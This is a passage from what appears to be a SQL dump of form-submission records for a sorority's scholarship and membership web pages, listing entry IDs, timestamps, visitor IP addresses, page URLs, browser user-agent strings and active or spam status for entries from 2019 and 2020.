20:41:22',0,0,'98.117.197.179','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(332,8,NULL,'2019-03-30 01:07:03',0,0,'173.79.181.22','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(333,6,NULL,'2019-03-30 01:09:06',0,0,'173.79.181.22','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(334,6,NULL,'2019-03-30 03:36:09',0,0,'100.36.60.74','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(335,6,NULL,'2019-03-30 03:57:47',0,0,'96.244.208.35','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(336,6,NULL,'2019-03-30 03:59:23',0,0,'100.36.77.228','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(337,8,NULL,'2019-04-02 22:33:25',0,0,'100.16.246.40','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_1_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(338,8,NULL,'2019-04-03 00:04:33',0,0,'69.143.221.108','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(339,8,NULL,'2019-04-03 01:28:53',0,0,'72.81.215.183','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(340,8,NULL,'2019-04-03 12:32:00',0,0,'50.225.39.81','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:52.0) Gecko/20100101 Firefox/52.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(341,8,NULL,'2019-04-06 20:43:54',0,0,'96.234.206.57','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(342,8,NULL,'2019-04-06 20:46:01',0,0,'96.234.206.57','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(343,8,NULL,'2019-04-15 05:07:32',0,0,'108.31.168.146','https://zphiblgz.org/scholarship/recommendation/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(344,10,NULL,'2019-04-28 19:56:02',0,0,'172.56.26.112','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 9; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.90 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(345,10,NULL,'2019-05-13 14:49:41',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(346,7,NULL,'2019-06-20 20:19:56',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/youth/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(347,10,NULL,'2019-06-20 20:21:55',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(348,10,NULL,'2019-07-29 23:41:27',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(349,10,NULL,'2019-08-04 01:56:39',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(350,10,NULL,'2019-08-04 02:01:47',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(351,10,NULL,'2019-08-04 02:08:17',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(352,10,NULL,'2019-09-10 15:00:59',0,0,'74.220.219.51','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(353,10,NULL,'2019-09-15 19:03:13',0,0,'108.15.31.142','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 6.0.1; P00I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(354,10,NULL,'2019-09-19 17:07:41',0,0,'192.30.144.6','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(355,10,NULL,'2019-09-30 23:48:59',0,0,'172.56.3.126','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 8.0.0; SM-G935T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.73 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(356,10,NULL,'2019-10-04 14:37:08',0,0,'153.31.112.24','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(357,10,NULL,'2019-10-10 16:46:05',0,0,'69.251.57.182','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(358,10,NULL,'2019-10-12 17:27:37',0,0,'172.58.188.148','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/77.0.3865.103 Mobile/15E148 Safari/605.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(359,10,NULL,'2019-10-14 02:35:51',0,0,'96.255.105.35','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(360,10,NULL,'2019-10-15 03:18:42',0,0,'69.250.93.243','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(361,10,NULL,'2019-10-16 16:52:12',0,0,'214.3.138.230','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(362,10,NULL,'2019-10-26 00:57:58',0,0,'174.205.3.226','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(363,10,NULL,'2019-10-31 23:22:45',0,0,'69.250.73.57','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(364,10,NULL,'2019-11-01 18:50:34',0,0,'104.63.234.94','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(365,7,NULL,'2019-11-06 12:44:40',0,0,'162.129.250.38','https://zphiblgz.org/sorority-membership/youth/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(366,10,NULL,'2019-11-06 12:50:27',0,0,'162.129.250.38','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(367,10,NULL,'2019-11-25 06:14:06',0,0,'69.143.215.119','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 9; SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(368,10,NULL,'2019-11-30 00:03:11',0,0,'174.205.9.49','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_1_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(369,10,NULL,'2020-01-12 01:23:01',0,0,'172.58.187.87','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(370,10,NULL,'2020-01-13 00:51:24',0,0,'173.69.171.10','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(371,10,NULL,'2020-01-13 01:06:07',0,0,'73.77.114.91','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 7.0; LG-M430) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(372,10,NULL,'2020-01-13 18:40:53',0,0,'162.115.44.102','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(373,10,NULL,'2020-01-14 18:23:03',0,0,'167.102.149.209','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(374,10,NULL,'2020-01-16 15:53:30',0,0,'107.77.241.9','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 7.0; SAMSUNG-SM-J727AZ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(375,10,NULL,'2020-01-16 16:07:22',0,0,'96.255.18.163','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(376,10,NULL,'2020-01-18 03:33:27',0,0,'100.15.121.209','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Linux; Android 10; SM-G970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.116 Mobile Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(377,6,NULL,'2020-01-21 00:54:56',0,0,'151.196.189.17','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(378,6,NULL,'2020-02-03 23:37:36',0,0,'73.173.37.145','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(379,6,NULL,'2020-02-05 02:05:01',0,0,'96.234.182.232','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(380,10,NULL,'2020-02-08 21:15:15',0,0,'174.192.211.154','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(381,6,NULL,'2020-02-10 03:50:43',0,0,'71.244.135.112','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(382,6,NULL,'2020-02-10 03:51:36',0,0,'71.244.135.112','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(383,6,NULL,'2020-02-12 03:56:12',0,0,'73.135.80.241','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; CrOS x86_64 12607.81.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.119 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(384,6,NULL,'2020-02-19 23:54:07',0,0,'96.244.131.237','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(385,6,NULL,'2020-02-27 04:26:39',0,0,'96.255.56.28','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(386,6,NULL,'2020-03-03 16:26:04',0,0,'204.126.132.241','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(387,6,NULL,'2020-03-07 17:25:39',0,0,'206.80.132.23','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(388,6,NULL,'2020-03-08 17:40:28',0,0,'71.244.130.26','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(389,6,NULL,'2020-03-08 20:29:35',0,0,'71.244.255.102','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(390,6,NULL,'2020-03-11 03:58:10',0,0,'71.121.250.35','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(391,6,NULL,'2020-03-11 17:15:03',0,0,'73.213.165.68','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(392,10,NULL,'2020-03-15 20:29:06',0,0,'107.77.203.94','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(393,6,NULL,'2020-03-17 17:36:57',0,0,'96.244.118.113','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(394,7,NULL,'2020-03-18 21:20:59',0,0,'68.33.178.41','https://zphiblgz.org/sorority-membership/youth/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(395,6,NULL,'2020-03-18 22:39:53',0,0,'71.127.150.198','http://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(396,6,NULL,'2020-03-21 17:30:08',0,0,'71.179.160.251','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(397,6,NULL,'2020-03-21 17:42:55',0,0,'107.77.204.66','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(398,6,NULL,'2020-03-21 19:45:43',0,0,'73.133.150.205','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(399,6,NULL,'2020-03-21 19:48:23',0,0,'73.133.150.205','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(400,6,NULL,'2020-03-21 19:50:32',0,0,'73.133.150.205','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(401,6,NULL,'2020-03-21 21:13:43',0,0,'73.133.150.205','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(402,6,NULL,'2020-03-26 19:02:24',0,0,'71.121.241.176','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(403,6,NULL,'2020-03-27 01:43:30',0,0,'68.134.23.183','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(404,6,NULL,'2020-03-29 18:16:53',0,0,'73.133.149.146','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(405,6,NULL,'2020-03-29 19:00:09',0,0,'71.163.49.143','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(406,6,NULL,'2020-03-29 19:48:03',0,0,'96.234.182.197','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(407,6,NULL,'2020-03-29 21:21:26',0,0,'47.133.160.216','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(408,6,NULL,'2020-03-29 21:34:23',0,0,'173.69.213.174','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(409,6,NULL,'2020-03-29 21:59:05',0,0,'73.213.165.20','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(410,6,NULL,'2020-03-30 01:03:32',0,0,'72.81.227.244','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(411,6,NULL,'2020-03-30 03:47:55',0,0,'72.81.137.185','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(412,6,NULL,'2020-03-30 22:41:03',0,0,'71.179.35.88','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(413,6,NULL,'2020-03-31 18:15:04',0,0,'96.234.167.112','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (X11; CrOS x86_64 12739.105.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.158 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(414,6,NULL,'2020-03-31 21:53:08',0,0,'71.127.147.245','https://zphiblgz.org/scholarship/application/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:74.0) Gecko/20100101 Firefox/74.0','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(415,10,NULL,'2020-04-22 09:33:32',0,0,'128.71.35.116','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(416,10,NULL,'2020-04-22 14:59:21',0,0,'128.71.35.116','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'spam',NULL),(417,10,NULL,'2020-05-03 07:02:45',0,0,'107.77.203.56','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (iPhone; CPU iPhone OS 13_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Mobile/15E148 Safari/604.1','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(418,10,NULL,'2020-05-03 11:42:34',0,0,'69.143.204.33','https://zphiblgz.org/sorority-membership/','Mozilla/5.0 (X11; CrOS x86_64 12871.91.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.127 Safari/537.36','USD',NULL,NULL,NULL,NULL,NULL,NULL,NULL,'active',NULL),(419,10,NULL,'2020-05-06 